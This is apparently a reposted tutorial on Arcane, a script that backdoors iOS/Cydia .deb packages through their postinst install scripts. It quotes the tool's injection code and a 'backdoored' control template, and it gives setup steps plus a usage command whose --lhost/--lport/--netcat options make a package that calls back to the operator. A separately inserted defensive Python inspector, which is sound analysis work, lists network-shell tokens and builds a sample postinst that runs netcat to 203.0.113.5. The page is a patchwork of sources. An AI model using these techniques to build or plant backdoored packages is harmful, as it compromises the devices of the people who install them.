
How to use the Arcane tool

2025-03-28 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/02 Report

This article explains how to use the Arcane tool. The explanation is kept simple and clear so that it is easy to follow; the sections below walk through what Arcane does, how it works, and how to set it up.

Arcane

Arcane is a security tool for iOS packages (iphoneos-arm). In essence, it is a small, simple script that helps researchers create the resources needed for an APT repository. The main purpose of the tool is to demonstrate why installing software through Cydia is risky: cyber criminals can use iOS packages to carry out post-exploitation attacks on vulnerable iOS devices, because the package itself can run commands on the device during installation.

Arcane working mechanism

To help you understand the mechanism behind Arcane, let's first unpack an iOS package that Arcane has created:

dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Here, pay attention to the control file and the postinst file in the DEBIAN directory; both are important:

tree /tmp/whois-decomp/
/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois

With Arcane, a malicious script can be embedded directly into an iOS package so that it runs while the application is being installed or removed. The package maintainer scripts supported by the package format are the preinst, postinst, prerm, and postrm files; Arcane uses the postinst file to execute arbitrary commands during installation of the iOS package.

The following is an excerpt from Arcane that handles the "post-installation" file. A postinst script executes commands on the target device after the package has been installed; it exists so that package maintainers can perform setup tasks during installation, and Arcane abuses this feature to inject Bash commands into the iOS package.

postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
}

During installation of an iOS package, the package manager reads the values contained in the control file. Arcane can either modify an existing control file or create a new one. Most iOS packages already ship with a control file; when one is missing, Arcane falls back to the template shown below, in which the "$hacker" variable acts as a placeholder for arbitrary attacker-chosen text.

# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker
Maintainer: $hacker
";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to locate in Cydia.
    msg "detected control file" succ;
    sed -i "0,/^Name:.*/s//Name: $hacker backdoor/" "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;

Download the tool
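The two excerpts above show the only places a package can run code at install time: the control file and the maintainer scripts inside the control archive. The defensive counterpart is to look at exactly those members before installing anything from a third-party repository. The following is an added example, not code from Arcane or from the original article. It assumes only the Python standard library and the structure of a .deb package (an `ar` container holding `debian-binary`, `control.tar.*` and `data.tar.*`); the sample package it builds at the bottom is constructed for the demonstration and is not one of Arcane's sample packages, and the `SUSPICIOUS_TOKENS` list and the 203.0.113.5 address are illustrative choices.

```python
"""Inspect a .deb / Cydia package for maintainer scripts before installing it.

Added example (not Arcane's code). Standard library only: a .deb is an `ar`
archive whose `control.tar.*` member carries the control fields and the
preinst/postinst/prerm/postrm scripts that run on the device at install time.
"""
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Illustrative indicators: a utility package has no reason to open network
# connections or pull remote content while it is being installed.
SUSPICIOUS_TOKENS = ("nc ", "netcat", "/dev/tcp", "curl ", "wget ", "bash -i", "base64 -d")


def parse_ar(blob: bytes) -> dict:
    """Parse the `ar` container used by .deb files; return {member name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    members, pos = {}, 8
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]                  # fixed 60-byte member header
        name = header[0:16].decode().strip().rstrip("/")
        size = int(header[48:58].decode().strip())
        data_start = pos + 60
        members[name] = blob[data_start:data_start + size]
        pos = data_start + size + (size % 2)        # members are 2-byte aligned
    return members


def inspect_deb(blob: bytes) -> dict:
    """Return the control fields and the text of every maintainer script found."""
    members = parse_ar(blob)
    ctrl_name = next(n for n in members if n.startswith("control.tar"))
    report = {"fields": {}, "scripts": {}}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl_name]), mode="r:*") as tar:
        for entry in tar:
            if not entry.isfile():
                continue
            base = entry.name.lstrip("./")           # "./postinst" -> "postinst"
            text = tar.extractfile(entry).read().decode(errors="replace")
            if base == "control":
                for line in text.splitlines():
                    if ":" in line and not line.startswith(" "):
                        key, _, val = line.partition(":")
                        report["fields"][key.strip()] = val.strip()
            elif base in MAINTAINER_SCRIPTS:
                report["scripts"][base] = text
    return report


def flag_scripts(report: dict) -> list:
    """Return (script, token) pairs for maintainer scripts that reference a
    network or download primitive; an empty list means nothing was flagged."""
    hits = []
    for name, text in report["scripts"].items():
        for tok in SUSPICIOUS_TOKENS:
            if tok in text:
                hits.append((name, tok))
    return hits


# --- constructed sample input (demo only, not a real package) -----------------
def _add(tar, name, text, mode):
    data = text.encode()
    info = tarfile.TarInfo(name)
    info.size, info.mode = len(data), mode
    tar.addfile(info, io.BytesIO(data))


def _ar_member(name: str, data: bytes) -> bytes:
    # name(16) mtime(12) uid(6) gid(6) mode(8) size(10) magic(2) = 60 bytes
    header = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
    return header + data + (b"\n" if len(data) % 2 else b"")


def build_sample_deb(postinst=None) -> bytes:
    """Build a minimal iphoneos-arm style .deb in memory, optionally with a postinst."""
    control = ("Package: com.example.demo\nName: demo\nVersion: 1.0\n"
               "Section: app\nArchitecture: iphoneos-arm\nDescription: demo package\n")
    ctrl_buf = io.BytesIO()
    with tarfile.open(fileobj=ctrl_buf, mode="w:gz") as tar:
        _add(tar, "./control", control, 0o644)
        if postinst is not None:
            _add(tar, "./postinst", postinst, 0o755)
    data_buf = io.BytesIO()
    with tarfile.open(fileobj=data_buf, mode="w:gz") as tar:
        _add(tar, "./usr/bin/demo", "#!/bin/sh\necho demo\n", 0o755)
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", ctrl_buf.getvalue())
            + _ar_member("data.tar.gz", data_buf.getvalue()))


if __name__ == "__main__":
    clean = inspect_deb(build_sample_deb())
    print("clean package scripts:", list(clean["scripts"]), "flags:", flag_scripts(clean))
    # Constructed postinst that phones home to a documentation-range address.
    tampered = inspect_deb(build_sample_deb("#!/bin/bash\nnc 203.0.113.5 4444 &\n"))
    print("tampered package scripts:", list(tampered["scripts"]), "flags:", flag_scripts(tampered))
```

Run it with no arguments to see the clean and tampered sample packages compared; to audit a real download, read the file into `inspect_deb` and review every script it returns, since a reviewer should read the whole maintainer script rather than rely on the token list alone. The parser deliberately reads the `ar` container itself instead of shelling out to dpkg-deb, so it also works on a workstation without dpkg installed.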

Researchers can use the following commands to clone the source code of the project locally:

git clone https://github.com/tokyoneon/Arcane.git

Using the tool

We recommend using Arcane on Kali v2020.3. The tool is configured and run with the following commands:

sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh; ./arcane.sh --help

Next, the following command embeds the malicious control instructions into a given iOS package:

./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost --lport --cydia --netcat

For more detailed instructions, you can refer to this [manual].

Sample iOS package

The following iOS packages are included in Arcane's code base so that researchers can test with them:

ls -la samples/
-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug 29  2018 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Jul  8 21:03 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug 29  2018 whois_5.3.2-1_iphoneos-arm.deb

The MD5 checksums of the sample iOS packages are shown below:

md5sum samples/*.deb
3f1712964701580b3f018305a55e217c  samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
795ccf9c6d53dd60d2f74f7a601f474f  samples/network-cmds_543-1_iphoneos-arm.deb
a020882dac121afa4b03c63304d729b0  samples/sed_4.5-1_iphoneos-arm.deb
38db275007a331e7ff8899ea22261dc7  samples/top_39-2_iphoneos-arm.deb
b40ee800b72bbac323568b36ad67bb16  samples/whois_5.3.2-1_iphoneos-arm.deb

Thank you for reading. The above is the content of "how to use the Arcane tool". After studying this article, you should have a deeper understanding of how Arcane works; the specific usage still needs to be verified in practice. The editor will continue to publish related articles, so you are welcome to follow along.
